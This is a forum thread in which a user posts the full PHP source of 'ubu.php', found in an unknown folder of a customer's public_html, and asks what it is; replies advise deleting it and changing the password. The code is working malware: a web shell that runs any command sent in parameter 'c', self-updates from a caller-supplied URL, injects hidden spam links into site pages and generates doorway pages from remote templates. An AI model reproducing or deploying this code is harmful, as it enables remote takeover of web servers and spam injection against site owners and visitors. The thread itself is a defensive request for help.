Thread: Unknown Folder

Hello,
I have found an unknown folder (zjfem) in a customers public_html.
here's the code contained in a "ubu.php file:
<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
$fin = ereg_replace("<!--dd5-->", "", $fin);
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
$var = $_POST[$name];

if (isset($_GET[$name]))
$var = $_GET[$name];

if (($var) =="")
return false;
else return true;
}


function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
$sg = $_POST["sg"];

if (isset($_GET["sg"]))
$sg = $_GET["sg"];

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
$fconf = file("c");
$tname = trim($fconf[0]);
}
else
{
$fconf = fopen("c", "w+");
$rnd = mt_rand(0, 999);
$nm = "";
for ($i=0; $i<5; $i++)
{
$ran = mt_rand(0,26);
$sym = $alp[$ran];
$nm = $nm.$sym;
}
$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname);
$pid = 0;
$fht = fopen("$tname/.htaccess", "w+");

$htname = $sg."2.txt";
$fp = fopen($htname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($fht, $fin);
fclose($fht);
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{

$fc = "";
$fp = fopen($gname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);

$arr = explode("</html>", $fin);
//print_r($arr);
$curs = trim($arr[1]);

$newf = "$tname/$curs/";
echo "$newf";
mkdir($newf);
$fnd = fopen("$tname/$curs/$curs".".htm", "w+");
fwrite($fnd, $fin);
fclose($fnd);
fwrite($fr, "$tname/$curs/$curs".".htm\n");


}

}

function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
$sg = $_POST["sg"];

if (isset($_GET["sg"]))
$sg = $_GET["sg"];

if (isset($_GET["md"]))
$md = true;

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
$fconf = file("c");
$tname = trim($fconf[0]);
$i_dor = trim($fconf[1]);
$i_dor = $i_dor+0;
}
else
{
$fconf = fopen("c", "w+");
$rnd = mt_rand(0, 999);
$nm = "";
for ($i=0; $i<5; $i++)
{
$ran = mt_rand(0,26);
$sym = $alp[$ran];
$nm = $nm.$sym;
}
$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname."\n");
fwrite($fconf, "0\n");
$pid = 0;
$fht = fopen("$tname/.htaccess", "w+");
$htname = $sg."2.txt";
$fp = fopen($htname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($fht, $fin);
fclose($fht);


$fht = fopen("$tname/2.js", "w+");
$htname = $sg."2js.txt";
$fp = fopen($htname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($fht, $fin);
fclose($fht);



$f1t = fopen("1t", "w+");
$f1tname = $sg."1t.php";
$fp = fopen($f1tname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($f1t, $fin);
fclose($f1t);


}
$i_dor++;
$i_dor--;
$a1t = file("1t");
$gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{

$cth = trim($a1t[$i_dor]);
$i_dor++;
$fc = "";
$fp = fopen($gname."?th=$cth", "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);


$links ="";
for ($y=0; $y<30; $y++)
{
$ry = mt_rand(0,199);
$rth = trim($a1t[$ry]);
$links .= "<a href='$rth.htm'>$rth</a> \n";
}
$fin = ereg_replace("<LINKS2>", $links, $fin);

$curs = $cth;
$fnd = fopen("$tname/$curs".".htm", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if ($md)
{
fwrite($fr, "$tname/$curs".".htm\n");
}
}
$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n".$i_dor."\n");
fclose($fconf);
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
$sg = $_POST["sg"];

if (isset($_GET["sg"]))
$sg = $_GET["sg"];

if (isset($_POST["gm"]))
$g = $_POST["gm"];

if (isset($_GET["gm"]))
$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
$fconf = file("c");
$tname = trim($fconf[0]);
$cname = trim($fconf[1]);
$curs = trim($fconf[2]);
$pid = trim($fconf[3]);
if ($pid == 100)
{
$pid = 0;
$rnd = mt_rand(0, 999);
$nm = "";
for ($i=0; $i<3; $i++)
{
$ran = mt_rand(0,26);
$sym = $alp[$ran];
$nm = $nm.$sym;
}
$cname = $nm;
mkdir("$tname/$cname");
$curs = $g;
}
}
else
{
$rnd = mt_rand(0, 999);
$nm = "";
for ($i=0; $i<5; $i++)
{
$ran = mt_rand(0,26);
$sym = $alp[$ran];
$nm = $nm.$sym;
}
$tname = $nm;
$pid = 0;
$curs = $g;
mkdir($tname);
$fht = fopen("$tname/.htaccess", "w+");
$htname = $sg."2.txt";
$fp = fopen($htname, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
fwrite($fht, $fin);
fclose($fht);
$rnd = mt_rand(0, 999);
$nm = "";
for ($i=0; $i<3; $i++)
{
$ran = mt_rand(0,26);
$sym = $alp[$ran];
$nm = $nm.$sym;
}
$cname = $nm;
mkdir("$tname/$cname");
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
$fp = fopen($gname."?g=$curs", "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);

$fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
fwrite($fnd, $fin);
fclose($fnd);
}

if ($j==100)
{
$fp = fopen($gname."?g=$curs&m=1", "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);
$fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
fwrite($fnd, $fin);
fclose($fnd);
$map = "$path/$tname/$cname/$curs"."_lm.htm";
fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

function Update()
{
if (isset($_GET["name"]))
$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
$u = $_POST['u'];

if (isset($_GET['u']))
$u = $_GET['u'];

$fp = fopen($u, "r");
$fin = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc) break;
$fin .= $fc;
}
fclose($fp);

$fthis = fopen($thisname, "w+");
fwrite($fthis, $fin);
fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
@system($_GET['c']);
}

function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";
$endtag = "</font></body></html><dd5> ";
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
// óäàëÿåì çàâåðøàþùèå õòìë òåãè
$fin = preg_replace ("/<\/body>/i", "", $fin);
$fin = preg_replace ("/<\/html>/i", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
$drs = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc)
{
exit();
}
$drs .= $fc;
}
fclose($fp);
$fin = $fin.$begtag;
$fin = $fin.$drs;
$fin = $fin.$endtag;
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}



function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
Update();
exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
Com();
exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
Gen();
exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
GenNew();
exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
Gen2();
exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
MRepl();
exit();
}

if (isset($_POST['cl']) || isset($_GET['cl']))
{
Clear();
exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
Clear2();
exit();
}

echo "<ok>";

}

Main();

?>
I need some help with this one.
Thanks

Zap it!!

Thanks M
I will delete it right away. What is it?

I can't tell you what it is, but the only folders inside your public_html should be ones you recognise. At the extreme worst, if you delete something you shouldn't, you only have to republish the site. But if it were me I would have zapped it on first glance. Seen another post very similar to this earlier. Get rid.. and possibly even change your password ; - )

password change completed.